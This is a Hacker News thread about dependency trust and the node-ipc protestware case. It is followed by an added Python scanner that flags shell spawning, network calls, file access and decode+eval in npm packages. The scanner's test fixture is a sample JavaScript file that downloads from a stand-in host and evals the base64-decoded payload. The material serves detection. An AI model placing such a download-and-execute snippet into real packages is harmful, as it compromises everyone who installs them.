by bradyd 886 days ago
I don't really see how this has anything to do with major geopolitical events, other than the fact that the developer of the library is Russian. The author's complaints could have happened with any open source library and don't seem to relate to the war in Ukraine in any way.

To give a more realistic answer to this question, when I was writing an article about npm dependencies[1], I incidentally came upon a case where the developer of node-ipc released a malicious version of the package that affected computers in Russian and Belarusian IPs specifically in response to the Ukraine war[2].

[1]: https://www.preethamrn.com/posts/who-actually-uses-is-odd

[2]: https://www.bleepingcomputer.com/news/security/big-sabotage-...

And then claimed his GitHub was "hacked" to save his ass. And was somehow not banned by GitHub despite clearly violating their TOS.
I forgot about that targeted malware for a while, thanks for jogging my memory.

Imagine now if he had done that towards Israelis or Arabs/Palestinians and how both the internet and governments would react.

He only got away with such blatant crime because the entire west was against Russia. Mad that the Overton window went so wide for a while there.

I read the article and got the same impression. It had no conclusion on global events affecting dependencies. More speculation rather than facts.
Thanks for your comments. I have to admit that it is shallow - going into more detail would risk identification of the people involved and paint a target on my back.

I do realize that he may have simply changed his opinion - yet it is the most controversial one and he stood by it ideologically as expressed numerous times through a variety of mediums.

It's a bit tinfoil hat, but I am disappointed and there's no harm in informing others about these observations and this experience. Mind you - and that's about all I'll add - that the repository stagnated in development for some time, which considerably increased my sense that something was off (browser extensions, for example, frequently get bought by criminals to convert a user base into a cash cow, or worse).

Disclaimer at the end of the article: If I am totally misinterpreting my observations and the Discord hostility without even an attempt at producing counter-arguments or productive and professional openness and communication, at least it serves as a cautionary tale of what could be. In any case, no disrespect or attempt to taint anyone's (open-source) software development ventures and/or their personality is intended. The name of the project or its developers will not be shared; if you can find it, be discreet or this article will be removed. Thank you.

Thanks for your time. Have a great weekend.

As someone off this thread, lol, I hope you have a great weekend too.

Whether it happened or not, it's a reminder of what can happen. Better to learn from mistakes you haven't suffered from so deeply yet. For starters, when in doubt, it doesn't hurt to get rid of the software dependencies you don't need.

For how to know you can trust a dependency, I'm afraid there is no solution: no theorem prover nor isolation, cryptography nor layerization can save you.

Though the dead weight loss of mutual distrust weighs on us all, shouts echo in the void, so go home and read code, and when the next day knocks its ugly knuckles, tears at least wet dry watchful eyes.

> For how to know you can trust a dependency, I'm afraid there is no solution: no theorem prover nor isolation, cryptography nor layerization can save you.

I'm taking a stab at addressing this problem with Packj [1]. It carries out static/dynamic/metadata analysis to look for "suspicious" attributes such as spawning of shell, invalid/expired email (i.e., no 2FA), use of files, network communication, use of decode+eval, mismatch of GitHub code vs packaged code, and several more.

1. https://github.com/ossillate-inc/packj
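To make the kind of check described in the comment above concrete, here is an added example (not Packj's code, and not from anyone in this thread) that does a coarse static pass over an npm-style package for four of the attributes listed: shell spawning, network communication, file use and decode+eval, plus a file-set comparison of the published package against its repository checkout. The sample package, the `UPSTREAM_REPO` stand-in and the `example.invalid` host are all constructed for the example; the regexes are a line-level first pass that flags candidates for human review, not a substitute for a tool that parses the code properly.

```python
import re

# Constructed sample: a tiny npm-style package as path -> source text. The
# lib/helper.js file is made up to trigger every rule below; nothing is executed.
SAMPLE_PACKAGE = {
    "index.js": "module.exports = function add(a, b) { return a + b; };\n",
    "lib/helper.js": (
        "const cp = require('child_process');\n"
        "const https = require('https');\n"
        "const fs = require('fs');\n"
        "https.get('https://example.invalid/payload', (res) => {\n"
        "  res.on('data', (chunk) => {\n"
        "    eval(Buffer.from(chunk.toString(), 'base64').toString());\n"
        "    fs.writeFileSync('/tmp/marker', 'x');\n"
        "  });\n"
        "});\n"
    ),
}

# Constructed stand-in for the upstream GitHub checkout of the same version:
# it lacks lib/helper.js, i.e. the published tarball carries code the repo does not.
UPSTREAM_REPO = {
    "index.js": "module.exports = function add(a, b) { return a + b; };\n",
}

# Line-oriented rules for the attributes named in the comment. A real scanner
# would walk the AST; these regexes only surface lines worth a human look.
RULES = {
    "shell_spawn": re.compile(r"\b(?:child_process|exec(?:Sync)?|spawn(?:Sync)?)\b"),
    "network": re.compile(
        r"\brequire\(\s*['\"](?:https?|net|dns|dgram)['\"]\s*\)"
        r"|\bhttps?\.(?:get|request)\s*\(|\bfetch\s*\("
    ),
    "file_access": re.compile(
        r"\brequire\(\s*['\"]fs['\"]\s*\)"
        r"|\bfs\.(?:write|read|unlink|rm|rename)\w*\s*\("
    ),
    "decode_eval": re.compile(r"\b(?:eval|Function)\s*\(\s*(?:Buffer\.from|atob)\s*\("),
}


def scan_sources(files):
    """Return {path: {rule: [line numbers]}} for files with at least one hit."""
    report = {}
    for path, text in files.items():
        hits = {}
        for lineno, line in enumerate(text.splitlines(), start=1):
            for name, pattern in RULES.items():
                if pattern.search(line):
                    hits.setdefault(name, []).append(lineno)
        if hits:
            report[path] = hits
    return report


def compare_with_upstream(packaged, upstream):
    """Diff the published file set against the repository checkout.

    Files present only in the tarball, or whose content differs from the repo,
    are the 'mismatch of GitHub code vs packaged code' signal.
    """
    packaged_paths, upstream_paths = set(packaged), set(upstream)
    return {
        "added": sorted(packaged_paths - upstream_paths),
        "removed": sorted(upstream_paths - packaged_paths),
        "modified": sorted(
            p for p in packaged_paths & upstream_paths if packaged[p] != upstream[p]
        ),
    }


if __name__ == "__main__":
    for path, hits in scan_sources(SAMPLE_PACKAGE).items():
        for rule, lines in hits.items():
            print(f"{path}: {rule} at line(s) {lines}")
    print("tarball vs repo:", compare_with_upstream(SAMPLE_PACKAGE, UPSTREAM_REPO))
```

On the constructed sample the scan reports nothing for `index.js` and flags every line of `lib/helper.js` that pulls in a shell, network or filesystem capability or evaluates decoded data, while the comparison shows `lib/helper.js` exists only in the published package. Either finding alone is not proof of anything (plenty of legitimate packages spawn processes or talk to the network), which is why the output is a review queue rather than a verdict.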